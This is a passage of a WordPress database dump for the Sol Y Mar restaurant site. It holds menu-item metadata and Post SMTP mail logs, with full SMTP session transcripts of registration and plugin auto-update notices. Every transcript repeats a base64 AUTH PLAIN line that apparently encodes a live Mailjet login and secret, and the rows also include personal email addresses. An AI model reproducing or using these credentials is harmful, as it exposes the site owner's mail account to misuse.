(58340,4586,'_menu_item_xfn',''),(58341,4586,'_menu_item_url',''),(58342,4586,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58343,4586,'_menu_item_icon','null'),(58344,4587,'_menu_item_type','post_type'),(58345,4587,'_menu_item_menu_item_parent','4389'),(58346,4587,'_menu_item_object_id','2646'),(58347,4587,'_menu_item_object','page'),(58348,4587,'_menu_item_target',''),(58349,4587,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58350,4587,'_menu_item_xfn',''),(58351,4587,'_menu_item_url',''),(58352,4587,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58353,4587,'_menu_item_icon','null'),(58354,4588,'_menu_item_type','post_type'),(58355,4588,'_menu_item_menu_item_parent','4392'),(58356,4588,'_menu_item_object_id','2646'),(58357,4588,'_menu_item_object','page'),(58358,4588,'_menu_item_target',''),(58359,4588,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58360,4588,'_menu_item_xfn',''),(58361,4588,'_menu_item_url',''),(58362,4588,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58363,4588,'_menu_item_icon','null'),(58364,4589,'_menu_item_type','post_type'),(58365,4589,'_menu_item_menu_item_parent','4354'),(58366,4589,'_menu_item_object_id','2652'),(58367,4589,'_menu_item_object','page'),(58368,4589,'_menu_item_target',''),(58369,4589,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58370,4589,'_menu_item_xfn',''),(58371,4589,'_menu_item_url',''),(58372,4589,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58373,4589,'_menu_item_icon','null'),(58374,4590,'_menu_item_type','post_type'),(58375,4590,'_menu_item_menu_item_parent','4348'),(58376,4590,'_menu_item_object_id','2652'),(58377,4590,'_menu_item_object','page'),(58378,4590,'_menu_item_target',''),(58379,4590,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58380,4590,'_menu_item_xfn',''),(58381,4590,'_menu_item_url',''),(58382,4590,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58383,4590,'_menu_item_icon','null'),(58384,4591,'_menu_item_type','post_type'),(58385,4591,'_menu_item_menu_item_parent','4389'),(58386,4591,'_menu_item_object_id','2843'),(58387,4591,'_menu_item_object','page'),(58388,4591,'_menu_item_target',''),(58389,4591,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58390,4591,'_menu_item_xfn',''),(58391,4591,'_menu_item_url',''),(58392,4591,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58393,4591,'_menu_item_icon','null'),(58394,4592,'_menu_item_type','post_type'),(58395,4592,'_menu_item_menu_item_parent','4392'),(58396,4592,'_menu_item_object_id','2843'),(58397,4592,'_menu_item_object','page'),(58398,4592,'_menu_item_target',''),(58399,4592,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58400,4592,'_menu_item_xfn',''),(58401,4592,'_menu_item_url',''),(58402,4592,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58403,4592,'_menu_item_icon','null'),(58404,4593,'_menu_item_type','post_type'),(58405,4593,'_menu_item_menu_item_parent','4389'),(58406,4593,'_menu_item_object_id','2857'),(58407,4593,'_menu_item_object','page'),(58408,4593,'_menu_item_target',''),(58409,4593,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58410,4593,'_menu_item_xfn',''),(58411,4593,'_menu_item_url',''),(58412,4593,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58413,4593,'_menu_item_icon','null'),(58414,4594,'_menu_item_type','post_type'),(58415,4594,'_menu_item_menu_item_parent','4392'),(58416,4594,'_menu_item_object_id','2857'),(58417,4594,'_menu_item_object','page'),(58418,4594,'_menu_item_target',''),(58419,4594,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58420,4594,'_menu_item_xfn',''),(58421,4594,'_menu_item_url',''),(58422,4594,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58423,4594,'_menu_item_icon','null'),(58424,4595,'solution','All good, mail sent.'),(58425,4595,'success','1'),(58426,4595,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58427,4595,'to_header','webmaster@baldisserri.com'),(58428,4595,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58429,4595,'original_to','webmaster@baldisserri.com'),(58430,4595,'original_subject','[Sol Y Mar] New User Registration'),(58431,4595,'original_message','New user registration on your site Sol Y Mar:\r\n\r\nUsername: attika\r\n\r\nEmail: attika@ristorantesolymar.it\r\n'),(58432,4595,'original_headers',''),(58433,4595,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <279275e0968e2126a3eb920ec2a0ee51@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] New User Registration\r\nDate: Sat, 23 Jan 2021 20:00:51 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nNew user registration on your site Sol Y Mar:=0D=0A=0D=0AUsername: attik=\r\na=0D=0A=0D=0AEmail: attika@ristorantesolymar.it=0D=0A\r\n.\r\n250 OK queued as a1cc1b42-900b-48fe-875f-607fbd64a4b0\r\n'),(58460,4603,'original_headers',''),(58461,4603,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4b2e7c4ac0f35412cab1cc81aa8a87c7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Tue, 26 Jan 2021 12:25:42 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Popu=\r\np Builder (from version 3.72 to 3.73)=0A- Really Simple SSL (from versio=\r\nn 4.0.6 to 4.0.7)=0A- Yoast SEO (from version 15.6.2 to 15.7)=0A=0A=0AIf=\r\n you experience any issues or need support, the volunteers in the WordPr=\r\ness.org support forums may be able to help.=0Ahttps://wordpress.org/supp=\r\nort/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK queued as f46f2228-cd77-4068-bfa2-4493547e2d93\r\n'),(58462,4605,'solution','All good, mail sent.'),(58463,4605,'success','1'),(58464,4605,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58465,4605,'to_header','webmaster@baldisserri.com'),(58466,4605,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58467,4605,'original_to','webmaster@baldisserri.com'),(58468,4605,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(58469,4605,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.19 to 2.0.20)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(58470,4605,'original_headers',''),(58471,4605,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <974024995298e08dbf38c457a6f662d7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 29 Jan 2021 00:27:01 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Post=\r\n SMTP (from version 2.0.19 to 2.0.20)=0A=0A=0AIf you experience any issu=\r\nes or need support, the volunteers in the WordPress.org support forums m=\r\nay be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe Wor=\r\ndPress Team\r\n.\r\n250 OK queued as 927ec725-3fa4-4a32-abfb-b9da341a4ff6\r\n'),(58472,4606,'solution','All good, mail sent.'),(58473,4606,'success','1'),(58474,4606,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58475,4606,'to_header','webmaster@baldisserri.com'),(58476,4606,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58477,4606,'original_to','webmaster@baldisserri.com'),(58478,4606,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(58479,4606,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Child Theme Configurator (from version 2.5.6 to 2.5.7)\n- UpdraftPlus - Backup/Restore (from version 1.16.46 to 1.16.47)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(58480,4606,'original_headers',''),(58481,4606,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <60d56ed78220d2a892b7f9f92092a07d@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 29 Jan 2021 12:23:15 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Chil=\r\nd Theme Configurator (from version 2.5.6 to 2.5.7)=0A- UpdraftPlus - Bac=\r\nkup/Restore (from version 1.16.46 to 1.16.47)=0A=0A=0AIf you experience=\r\n any issues or need support, the volunteers in the WordPress.org support=\r\n forums may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=\r\n=0AThe WordPress Team\r\n.\r\n250 OK queued as 4de42d30-e323-4484-aec4-4fedfbd72311\r\n'),(58482,475,'mkdf_show_new_sign_woo_meta','no'),(58484,475,'rs_page_bg_color',''),(58485,475,'mwb_wgm_exclude_per_pro_format',''),(58486,475,'mwb_wgm_include_per_product',''),(58487,475,'mwb_wgm_include_per_pro_format',''),(58488,475,'mwb_wgm_include_per_category','a:0:{}'),(58489,475,'_yoast_wpseo_estimated-reading-time-minutes','1'),(58490,475,'_wp_old_slug','regala-cena-menu-storico-per-2-persone-con-bevande'),(58491,4608,'solution','All good, mail sent.'),(58492,4608,'success','1'),(58493,4608,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58494,4608,'to_header','webmaster@baldisserri.com'),(58495,4608,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58496,4608,'original_to','webmaster@baldisserri.com'),(58497,4608,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58498,4608,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Child Theme Configurator (da versione 2.5.7 a 2.5.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58499,4608,'original_headers',''),(58500,4608,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <252c1aaa085e410d5564470ee5883015@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sun, 31 Jan 2021 15:22:37 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Child Theme Configurator (da=\r\n versione 2.5.7 a 2.5.8)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai=\r\n bisogno di aiuto, i volontari dei forum di supporto su https://it.wordp=\r\nress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.or=\r\ng/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as d7017530-ef12-4583-88eb-8e3131dc23a8\r\n'),(58504,4612,'success','1'),(58503,4612,'solution','All good, mail sent.'),(58505,4612,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58506,4612,'to_header','webmaster@baldisserri.com'),(58507,4612,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58508,4612,'original_to','webmaster@baldisserri.com'),(58509,4612,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58510,4612,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.73 a 3.74)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58511,4612,'original_headers',''),(58512,4612,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <6ebd4ea18fd1958bab1821fafcdbbeb3@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 02 Feb 2021 00:59:00 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..73 a 3.74)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as c834e8c0-1842-41df-ab71-f403baa9f6f8\r\n'),(58513,4613,'solution','All good, mail sent.'),(58514,4613,'success','1'),(58515,4613,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58516,4613,'to_header','webmaster@baldisserri.com'),(58517,4613,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58518,4613,'original_to','webmaster@baldisserri.com'),(58519,4613,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58520,4613,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.3 a 3.1.4)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58521,4613,'original_headers',''),(58522,4613,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c369632009b9ccc10e03dde907aee4a7@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 02 Feb 2021 14:15:58 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Newsletter, SMTP, Email mark=\r\neting and Subscribe forms by Sendinblue (da versione 3.1.3 a 3.1.4)=0A=\r\n=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volont=\r\nari dei forum di supporto su https://it.wordpress.org/forums/ possono ri=\r\nuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl t=\r\neam di WordPress\r\n.\r\n250 OK queued as e92d0c4b-3179-4822-86c0-813f0709f04a\r\n'),(58523,4614,'solution','All good, mail sent.'),(58524,4614,'success','1'),(58525,4614,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58526,4614,'to_header','webmaster@baldisserri.com'),(58527,4614,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58528,4614,'original_to','webmaster@baldisserri.com'),(58529,4614,'original_subject','[Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.1'),(58530,4614,'original_message','Ciao! Il tuo sito su https://www.ristorantesolymar.it/vecchio è stato aggiornato automaticamente a WordPress 5.6.1.\n\nNon è richiesta da parte tua alcuna altra operazione. Per altre informazioni sulla versione 5.6.1 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad 